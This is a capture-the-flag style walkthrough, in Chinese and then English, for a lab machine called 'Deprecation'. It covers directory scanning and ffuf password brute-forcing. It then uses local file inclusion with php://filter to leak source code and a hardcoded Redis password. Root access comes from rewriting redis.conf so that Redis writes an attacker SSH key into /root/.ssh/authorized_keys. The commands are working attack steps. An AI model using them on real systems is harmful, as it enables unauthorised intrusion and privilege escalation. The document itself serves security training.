mazesec deprecation

枚举

初始扫描发现目标仅开放了常规 Web 端口。

# 必须使用 -x 指定后缀，否则 Gobuster 默认只找目录
gobuster dir -u http://192.168.0.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,bak

发现关键端点：

/index.php (登录页面)
/reg.php (注册页面，存在密码防重用枚举逻辑漏洞)
/config.php (后端配置)
/dashboard.php (登录后的控制面板)

FFUF

使用ffuf猜测密码

把在 Burp 里抓到的原始 HTTP 请求直接复制，保存到 Kali 机器上，命名为 req.txt。

ffuf -request req.txt -request-proto http -w /usr/share/wordlists/rockyou.txt -fs "[]"

得到两个密码：guest123，123123

同理，使用ffuf在index.php测试账户名

ffuf -request login.txt -request-proto http -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -mc "301"

得到：

guest：guest123
test：123123

Web

登录框存在简单的防爆破机制（基于 Session 的尝试次数限制），但通过目录扫描发现了后台页面 dashboard.php。

审计代码

通过测试 dashboard.php，发现其存在 Local File Inclusion (LFI) 漏洞。

# 读取 /etc/passwd 发现高价值目标
http://192.168.0.104/dashboard.php?view=../../../../../etc/passwd

由于直接包含 PHP 文件会被解析为空白，采用 PHP 伪协议 php://filter 提取后端核心源码。

# 读取核心业务逻辑源码
curl -s "http://192.168.0.104/dashboard.php?view=php://filter/read=convert.base64-encode/resource=index.php" | base64 -d
curl -s "<http://192.168.0.104/dashboard.php?view=php://filter/read=convert.base64-encode/resource=config.php>" | base64 -d

从源码中提取到两个重大情报：

Redis 凭据泄露：index.php 中硬编码了本地 Redis 的密码：mypassword123。
底层函数限制：dashboard.php 使用的是 file_get_contents() 函数读取文件，而非 include()。这意味着目标不支持代码执行，传统的日志投毒 (Log Poisoning) 战术失效。

利用 (社工密码推导)

跳出反序列化陷阱，重新审视 LFI 读出的 /etc/passwd 文件，发现系统注释字段 (GECOS) 存在极其明显的提示：

shanran:x:1000:1000:shan******:/home/shanran:/bin/sh

结合 config.php 源码中开发者对测试用户的设置规律：

账号 test -> 密码 123123
账号 guest -> 密码 guest123

推导公式：shanran (7位) + 123 (3位) = 10位。完美契合 shan****** 的掩码结构。

USER

使用推导出的密码直接进行 SSH 远程登录。

# 获取初始立足点 (Initial Access)
ssh shanran@192.168.0.104
# 密码: shanran123

ROOT

收集系统权限信息，发现经典的服务配置错误提权漏洞。

shanran@Deprecation:~$ sudo -l
User shanran may run the following commands on Deprecation:
    (ALL) NOPASSWD: /sbin/rc-service redis restart
    (ALL) NOPASSWD: /sbin/rc-service redis stop
    (ALL) NOPASSWD: /sbin/rc-service redis start

检查 Redis 服务运行状态与权限：

# 1. 发现 Redis 违规以 root 身份运行
ps aux | grep redis  ->  root 2396 ... /usr/bin/redis-server
# 2. 发现 redis 组对主配置文件拥有写权限
ls -l /etc/redis.conf -> -rw-rw-r-- 1 root redis 325 /etc/redis.conf
# 3. 确认当前用户 shanran 隶属于 redis 组
id

利用 (Redis 任意文件写入劫持)

利用对 /etc/redis.conf 的写权限，将 Redis 的持久化备份目录强制指向 root 用户的 SSH 信任目录，通过 Redis 将我们的 SSH 公钥注入其中。

# 1. 篡改 Redis 配置文件，接管持久化路径
echo 'dir /root/.ssh' > /etc/redis.conf
echo 'dbfilename authorized_keys' >> /etc/redis.conf
echo 'port 6379' >> /etc/redis.conf
echo 'requirepass mypassword123' >> /etc/redis.conf
echo 'bind 127.0.0.1' >> /etc/redis.conf

# 2. 以 root 权限重启 Redis 使恶意配置生效
sudo /sbin/rc-service redis restart

# 3. 登录 Redis 并注入 Kali 攻击机的 SSH 公钥
redis-cli -a mypassword123
127.0.0.1:6379> flushall
# 注意前后添加换行符，防止 RDB 二进制格式破坏公钥解析
127.0.0.1:6379> set crackit "\\n\\nssh-rsa AAAAB3Nza...[你的公钥]... kali@kali\\n\\n"
127.0.0.1:6379> save
127.0.0.1:6379> exit

# 4. SSH 免密直连 Root
ssh root@192.168.0.104

mazesec Deprecation

Enumeration

The initial scan revealed that the target only opens standard web ports.

# The `-x` option must be used to specify the file extensions; otherwise, Gobuster will only search for directories by default.
gobuster dir -u http://192.168.0.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,bak

Key endpoints were identified:

/index.php (Login page)
/reg.php (Registration page, with a vulnerability related to password reuse enumeration)
/config.php (Backend configuration)
/dashboard.php (Control panel after login)

FFUF

Password guessing was performed using FFUF:

Copy the original HTTP requests captured in Burp and save them to the Kali machine under the name req.txt.

ffuf -request req.txt -request-proto http -w /usr/share/wordlists/rockyou.txt -fs "[]"

Two passwords were obtained: guest123 and 123123.

Similarly, account names were tested using FFUF on index.php:

ffuf -request login.txt -request-proto http -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -mc "301"

The following accounts were discovered:

guest: guest123
test: 123123

Web

The login form has a simple anti-brute-force mechanism (based on a limit on the number of attempts), but the backend page /dashboard.php was found through directory scanning.

Code Audit

Testing dashboard.php revealed a Local File Inclusion (LFI) vulnerability:

# Reading `/etc/passwd` to find valuable targets
http://192.168.0.104/dashboard.php?view=../../../../../etc/passwd

Since directly including the PHP file would result in it being parsed as empty, the PHP pseudo-protocol php://filter was used to extract the core backend code.

# Extracting the core business logic code
curl -s "http://192.168.0.104/dashboard.php?view=php://filter/read=convert.base64-encode/resource=index.php" | base64 -d
curl -s "<http://192.168.0.104/dashboard.php?view=php://filter/read=convert.base64-encode/resource/config.php>" | base64 -d

Two important pieces of information were extracted from the code:

Redis credentials were leaked: The local Redis password is hardcoded in index.php as mypassword123.
The dashboard.php function uses file_get_contents() to read files, not include(). This indicates that the target does not support code execution, making traditional Log Poisoning tactics ineffective.

After escaping the deserialization trap, re-examining the /etc/passwd file revealed a clear hint in the system comment field (GECOS):

shanran:x:1000:1000:shan******:/home/shanran:/bin/sh

Combining this with the developer’s settings for test accounts in config.php:

Account: test → Password: 123123
Account: guest → Password: guest123

The derivation formula is: shanran (7 characters) + 123 (3 characters) = 10 characters, which perfectly matches the mask structure of shan******.

USER

Use the derived password to perform an SSH remote login directly.

# Obtain initial access
ssh shanran@192.168.0.104
# Password: shanran123

ROOT

Collect system permission information and identify a classic privilege escalation vulnerability due to incorrect service configuration.

shanran@Deprecation:~$ sudo -l
User shanran may run the following commands on Deprecation:
    (ALL) NOPASSWD: /sbin/rc-service redis restart
    (ALL) NOPASSWD: /sbin/rc-service redis stop
    (ALL) NOPASSWD: /sbin/rc-service redis start

Check the status and permissions of the Redis service:

# 1. Redis is running under the root account, which is a violation of security policies.
ps aux | grep redis  ->  root 2396 ... /usr/bin/redis-server
# 2. The redis group has write permissions on the main configuration file.
ls -l /etc/redis.conf -> -rw-rw-r-- 1 root redis 325 /etc/redis.conf
# 3. Verify that the current user shanran is a member of the redis group.
id

Exploit the write permission on /etc/redis.conf Utilize the write permission to force Redis to use the root user’s SSH trust directory as its persistence backup directory, and inject our SSH public key into Redis.

# 1. Modify the Redis configuration file to change the persistence path.
echo 'dir /root/.ssh' > /etc/redis.conf
echo 'dbfilename authorized_keys' >> /etc/redis.conf
echo 'port 6379' >> /etc/redis.conf
echo 'requirepass mypassword123' >> /etc/redis.conf
echo 'bind 127.0.0.1' >> /etc/redis.conf

2. Restart Redis with root privileges to apply the malicious configuration.

sudo /sbin/rc-service redis restart

3. Log in to Redis and inject the SSH public key from the Kali attacker’s machine.

redis-cli -a mypassword123 127.0.0.1:6379> flushall

Make sure to add line breaks before and after the key to prevent the RDB binary format from damaging the key parsing.

127.0.0.1:6379> set crackit “\n\nssh-rsa AAAAB3Nza…[your public key]… kali@kali\n\n” 127.0.0.1:6379> save 127.0.0.1:6379> exit

4. Establish an SSH connection to the root account without a password.

ssh root@192.168.0.104